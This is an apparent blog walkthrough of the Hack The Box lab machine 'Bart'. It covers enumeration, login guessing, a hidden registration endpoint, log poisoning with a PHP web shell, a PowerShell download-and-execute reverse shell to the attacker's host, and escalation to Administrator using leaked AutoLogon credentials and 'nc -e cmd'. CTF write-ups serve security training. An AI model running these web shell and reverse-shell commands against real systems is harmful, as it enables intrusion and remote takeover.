I"»`<h1 id="masscan--nmap">Masscan + Nmap</h1>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>masscan <span class="nt">-p1-65535</span>,U:1-65535 <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">--rate</span><span class="o">=</span>5000 <span class="nt">-e</span> tun0 | <span class="nb">tee </span>masscan.out
Discovered open port 80/tcp on 10.10.10.81
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Parse those ports to nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre><span class="nv">$ ports</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat </span>masscan.out |awk <span class="s1">'{ print $4 }'</span> | <span class="nb">sed</span> <span class="s1">'s/\/tcp//;s/\/udp//'</span> | <span class="nb">tr</span> <span class="s1">'\n'</span> <span class="s1">','</span> | <span class="nb">sed</span> <span class="s1">'s/,$//'</span><span class="si">)</span>
<span class="nv">$ </span>nmap <span class="nt">-v</span> <span class="nt">-sVC</span> <span class="nt">--min-rate</span> 1000 <span class="nt">-p</span> <span class="nv">$ports</span> <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-oN</span> nmap-fullscan.out

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 50465238F8A85D0732CBCC8EB04920AA
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="http">HTTP</h1>
<h2 id="forum">Forum</h2>
<p>Visiting http server, it redirects to http://forum.bart.htb/ which I add to my /etc/hosts.
Directory fuzzing:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>ffuf <span class="nt">-u</span> http://10.10.10.81/FUZZ <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt <span class="nt">-fc</span> 200

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive &lt;3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.81/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 200
________________________________________________

forum                   [Status: 301, Size: 148, Words: 9, Lines: 2]
.                       [Status: 302, Size: 0, Words: 1, Lines: 1]
Forum                   [Status: 301, Size: 148, Words: 9, Lines: 2]
monitor                 [Status: 301, Size: 150, Words: 9, Lines: 2]
Monitor                 [Status: 301, Size: 150, Words: 9, Lines: 2]
FORUM                   [Status: 301, Size: 148, Words: 9, Lines: 2]
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>For forum:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>ffuf <span class="nt">-u</span> http://forum.bart.htb/FUZZ <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt <span class="nt">-e</span> .php,.html,.aspx,.asp
index.html              <span class="o">[</span>Status: 200, Size: 35529, Words: 2090, Lines: 549]
<span class="nb">.</span>                       <span class="o">[</span>Status: 200, Size: 35529, Words: 2090, Lines: 549]
Index.html              <span class="o">[</span>Status: 200, Size: 35529, Words: 2090, Lines: 549]
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Visiting /forum/ doesn‚Äôt give much. Source code has some names and their mail-ids:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>s.brown
d.simmons
r.hilton
h.potter
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The last username is <code class="language-plaintext highlighter-rouge">Harvey Potter</code>, who‚Äôs mentioned as <code class="language-plaintext highlighter-rouge">Developer@BART</code> and is commented out in the source code.</p>

<h2 id="monitor">Monitor</h2>
<p>Visiting /monitor gives a login form.
If I try to login with <code class="language-plaintext highlighter-rouge">h.potter:anything</code> it says information incorrect.
But you can still enumerate the username with the forgot password option. It says <em>‚ÄúProvided username couldn‚Äôt be found.‚Äù</em>  for a wrong username.</p>

<p>Even though the usernames were given in f.lastname format the username came out to be <code class="language-plaintext highlighter-rouge">harvey</code>.
Since the login form had a CSRF token, It isn‚Äôt brute forcible with tools like hydra or burp. 
I tried some common passwords, combinations of <code class="language-plaintext highlighter-rouge">harvey:harvey</code> and so on..</p>

<p><code class="language-plaintext highlighter-rouge">harvey:potter</code> worked and I logged in as developer Harvey Potter. 
Not any link in the page fetches to <code class="language-plaintext highlighter-rouge">monitor.bart.htb</code> so I add that to my hosts file.</p>

<p>The only thing interesting now is when you visit <a href="http://monitor.bart.htb/?&amp;mod=server">monitor.bart.htb/?&amp;mod=server</a></p>

<p><img src="/assets/img/Posts/Bart/bart-1.png" alt="bart-1.png" /></p>

<p>Which gives another virtual host for us to add in hosts file <code class="language-plaintext highlighter-rouge">internal-01.bart.htb</code>.</p>

<h2 id="internal-01">Internal-01</h2>
<p>Accessing Internal-01 gave another login portal. 
Entering any wrong password gives <em>‚ÄúThe Password must be at least 8 characters‚Äù</em> or <em>‚ÄúInvalid Username or Password‚Äù</em>.</p>

<ul>
  <li>I can take the username list try spraying usernames with password once again. 
<code class="language-plaintext highlighter-rouge">f.lastname</code> already says username not valid, but that‚Äôs because it contains a special character, as it accepts any user otherwise.</li>
  <li>Directory brute forcing <code class="language-plaintext highlighter-rouge">internal-01.bart.htb</code> and <code class="language-plaintext highlighter-rouge">/simple_chat/</code> leads nowhere.</li>
  <li>SQL injection doesn‚Äôt look good here too.</li>
</ul>

<p>Checking out the source code, I see only one CSS file loaded:</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="cp">&lt;!DOCTYPE html"&gt;</span>
<span class="nt">&lt;html&gt;</span>
	<span class="nt">&lt;head&gt;</span>
		<span class="nt">&lt;title&gt;</span>Login Form<span class="nt">&lt;/title&gt;</span>
		<span class="nt">&lt;meta</span> <span class="na">charset=</span><span class="s">"UTF-8"</span><span class="nt">&gt;</span>
		<span class="nt">&lt;link</span> <span class="na">type=</span><span class="s">"text/css"</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">href=</span><span class="s">"css/chat_global.css"</span><span class="nt">&gt;</span>
		<span class="nt">&lt;style </span><span class="na">type=</span><span class="s">"text/css"</span><span class="nt">&gt;</span>
			<span class="nf">#uname</span><span class="o">,</span>  <span class="nf">#passwd</span><span class="o">,</span> <span class="nf">#submit_login</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>It has comments as:</p>
<div class="language-css highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="c">/**********************************************\
* Copyright (c) 2013 Manolis Agkopian          *
* See the file LICENCE for copying permission. *
\**********************************************/</span>

<span class="nt">body</span> <span class="o">,</span> <span class="nt">div</span><span class="o">,</span> <span class="nt">img</span><span class="o">,</span> <span class="nt">p</span><span class="o">,</span> <span class="nt">h1</span><span class="p">{</span>
	<span class="nl">font-family</span><span class="p">:</span> <span class="n">arial</span><span class="p">;</span> 
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So the code is originally made by ‚ÄúManolis Agkopian‚Äù. If I Google something like:</p>
<blockquote>
  <p><em>‚ÄúManolis Agkopian chat login‚Äù</em>
It gives: <em>‚Äú<a href="https://github.com/magkopian/php-ajax-simple-chat">magkopian/php-ajax-simple-chat</a> ¬∑ GitHub‚Äù</em></p>
</blockquote>

<ul>
  <li>I tried to find any default credentials in that project, but that‚Äôs not the case here.</li>
  <li>There‚Äôs one .sql database file, but it doesn‚Äôt contain any password too.</li>
</ul>

<p>One thing to notice is Register option is removed from internal-01. The original project contains a file named <code class="language-plaintext highlighter-rouge">register.php</code> to register users and it looks something like this:</p>

<p><img src="/assets/img/Posts/Bart/bart-2.png" alt="bart-2.png" /></p>

<p>But if I try to access <code class="language-plaintext highlighter-rouge">register.php</code>, it redirects to <code class="language-plaintext highlighter-rouge">register_form.php</code>. 
<code class="language-plaintext highlighter-rouge">register.php</code> accepts POST requests which I can confirm by passing a OPTIONS request. (<code class="language-plaintext highlighter-rouge">TRACE, HEAD, POST</code>).
So, even if the register link is removed, register option remains and I can do that by passing a POST request.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>curl <span class="nt">-XPOST</span> internal-01.bart.htb/simple_chat/register.php <span class="nt">-d</span> <span class="s2">"uname=caretaker&amp;passwd=caretaker"</span> <span class="nt">-i</span>

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: register_form.php
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.1.7
Set-Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>6db356sempok90d1d3vcsn7na9<span class="p">;</span> <span class="nv">path</span><span class="o">=</span>/
Date: Sat, 31 Jul 2021 13:18:40 GMT
Content-Length: 0
</pre></td></tr></tbody></table></code></pre></div></div>

<p>After logging in, I see:</p>

<p><img src="/assets/img/Posts/Bart/bart-3.png" alt="bart-3.png" /></p>

<p>Bobby says Harvey not to put development code in the site. There are some comments in the source code, but this script tag is quite interesting.</p>

<h1 id="log-poisoning">Log poisoning</h1>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
		<span class="kd">function</span> <span class="nx">saveChat</span><span class="p">()</span> <span class="p">{</span>
			<span class="c1">// create a serialized object and send to log_chat.php. Once done hte XHR request, alert "Done"</span>
		<span class="kd">var</span> <span class="nx">xhr</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
		<span class="nx">xhr</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
    		<span class="k">if</span> <span class="p">(</span><span class="nx">xhr</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="nx">XMLHttpRequest</span><span class="p">.</span><span class="nx">DONE</span><span class="p">)</span> <span class="p">{</span>
        		<span class="nx">alert</span><span class="p">(</span><span class="nx">xhr</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span>
    		<span class="p">}</span>
		<span class="p">}</span>
		<span class="nx">xhr</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://internal-01.bart.htb/log/log.php?filename=log.txt&amp;username=harvey</span><span class="dl">'</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
		<span class="nx">xhr</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span>
		<span class="nx">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">Done</span><span class="dl">"</span><span class="p">);</span>
<span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></pre></td></tr></tbody></table></code></pre></div></div>
<p>This piece of code explain the functionality of <code class="language-plaintext highlighter-rouge">log</code> button on the page.</p>
<ul>
  <li>Create a serialized object of the current request, store it in variable xhr.</li>
  <li>xhr.open() passes GET request to <code class="language-plaintext highlighter-rouge">/log/log.php</code> with a parameter <code class="language-plaintext highlighter-rouge">filename</code> containing a filename and username</li>
  <li>Pops an alert ‚ÄúDone‚Äù</li>
  <li>function is called and fetched requested from xhr.open() is alerted.</li>
</ul>

<p>Let‚Äôs change that <code class="language-plaintext highlighter-rouge">log.txt</code> filename to any other file, and try to make out what log.php is doing.
If I try to access <code class="language-plaintext highlighter-rouge">C:/boot.ini</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>curl <span class="nt">-s</span> <span class="s1">'http://internal-01.bart.htb/log/log.php?filename=C:\boot.ini&amp;username=harvey'</span> 

Warning: file_put_contents<span class="o">(</span>C:<span class="se">\b</span>oot.ini<span class="o">)</span>: failed to open stream: Permission
denied <span class="k">in </span>C:<span class="se">\i</span>netpub<span class="se">\w</span>wwroot<span class="se">\i</span>nternal-01<span class="se">\l</span>og<span class="se">\l</span>og.php on line 41
1
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So, log.php tries to run <code class="language-plaintext highlighter-rouge">file_put_contents()</code> on boot.ini, Since it did not have much permissions, it didn‚Äôt work.
Let‚Äôs try to write in current directory, where we might have perms.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>curl <span class="nt">-s</span> <span class="s1">'http://internal-01.bart.htb/log/log.php?filename=.\caretaker.txt&amp;username=harvey'</span>  
1
<span class="nv">$ </span>curl http://internal-01.bart.htb/log/caretaker.txt
<span class="o">[</span>2021-07-31 17:36:36] - harvey - curl/7.74.0[2021-07-31 17:36:52] - harvey - curl/7.74.0
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I‚Äôll write a php file and inject php code using User-Agent headers.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>curl <span class="nt">-s</span> <span class="s1">'http://internal-01.bart.htb/log/log.php?filename=.\test.php&amp;username=harvey'</span> <span class="nt">-A</span> <span class="s1">'&lt;?php system($_GET['</span>cmd<span class="s1">']); ?&gt;'</span>
1
<span class="nv">$ </span>curl <span class="nt">-s</span> <span class="s1">'http://internal-01.bart.htb/log/test.php?cmd=whoami'</span>  
<span class="o">[</span>2021-07-31 17:43:11] - harvey - nt authority<span class="se">\i</span>usr
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now, I easily got a reverse-shell using <code class="language-plaintext highlighter-rouge">Invoke-PowerShellTcp.ps1</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>curl <span class="s1">'http://internal-01.bart.htb/log/test.php?cmd=powershell%20iex%20(New-Object%20Net.WebClient).DownloadString(%27http://10.10.14.2/Invoke-PowerShellTcp.ps1%27);Invoke-PowerShellTcp%20-Reverse%20-IPAddress%2010.10.14.2%20-Port%204444'</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>rlwrap nc <span class="nt">-lnvp</span> 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.81 52288
Windows PowerShell running as user BART<span class="nv">$ </span>on BART
Copyright <span class="o">(</span>C<span class="o">)</span> 2015 Microsoft Corporation. All rights reserved.

PS C:<span class="se">\i</span>netpub<span class="se">\w</span>wwroot<span class="se">\i</span>nternal-01<span class="se">\l</span>og&gt; <span class="nb">whoami
</span>nt authority<span class="se">\i</span>usr
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Since, log.php contains file <code class="language-plaintext highlighter-rouge">file_put_contents()</code> here I could‚Äôve wrote on any file. If I still wouldn‚Äôt have write access to directory, I would‚Äôve tried writing in log.php. 
Even if log.php wasn‚Äôt writing in any file and it was a usual log file. The above idea would‚Äôve worked.</p>

<h1 id="privesc">Privesc</h1>
<p>Running winpeas shows:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>  <span class="o">[</span>+] Looking <span class="k">for </span>AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  DESKTOP-7I3S68E
    DefaultUserName               :  Administrator
    DefaultPassword               :  3130438f31186fbaf962f407711faddb

  <span class="o">[</span>+] UAC Status
   <span class="o">[</span>?] If you are <span class="k">in </span>the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 1
    FilterAdministratorToken:ccountTokenFilterPolicy <span class="nb">set </span>to 1.
      <span class="o">[</span>+] Any <span class="nb">local </span>account can be used <span class="k">for </span>lateral movement.
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I can see there are autologon credentials stored and there‚Äôs no UAC.
First I need to change my shell (If I‚Äôve spawned with Invoke-powershellTcp) as even if I setup my credentials correctly, I wouldn‚Äôt be able to call functions like <code class="language-plaintext highlighter-rouge">Start-Process</code> or  <code class="language-plaintext highlighter-rouge">Invoke-Command</code> as they wouldn‚Äôt be defined.</p>

<p>I got a new shell with netcat64 binary.
Then I can make PSCredential object:</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nv">$SecPass</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ConvertTo-SecureString</span><span class="w"> </span><span class="s1">'3130438f31186fbaf962f407711faddb'</span><span class="w"> </span><span class="nt">-AsPlainText</span><span class="w"> </span><span class="nt">-Force</span><span class="p">;</span><span class="nv">$cred</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Management.Automation.PSCredential</span><span class="p">(</span><span class="s1">'Administrator'</span><span class="p">,</span><span class="w"> </span><span class="nv">$SecPass</span><span class="p">);</span><span class="w">
</span><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Start-Process</span><span class="w"> </span><span class="nt">-FilePath</span><span class="w"> </span><span class="s2">"powershell"</span><span class="w"> </span><span class="nt">-argumentlist</span><span class="w"> </span><span class="s2">"C:\temp\nc.exe -e cmd 10.10.14.2 6666"</span><span class="w"> </span><span class="nt">-Credential</span><span class="w"> </span><span class="nv">$cred</span><span class="w">
</span></pre></td></tr></tbody></table></code></pre></div></div>
<p>And I got a shell as administrator.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 6666
Listening on 0.0.0.0 6666
Connection received on 10.10.10.81 55838
Microsoft Windows <span class="o">[</span>Version 10.0.15063]
<span class="o">(</span>c<span class="o">)</span> 2017 Microsoft Corporation. All rights reserved.

C:<span class="se">\i</span>netpub<span class="se">\w</span>wwroot<span class="se">\i</span>nternal-01<span class="se">\l</span>og&gt;whoami
bart<span class="se">\a</span>dministrator
</pre></td></tr></tbody></table></code></pre></div></div>
:ET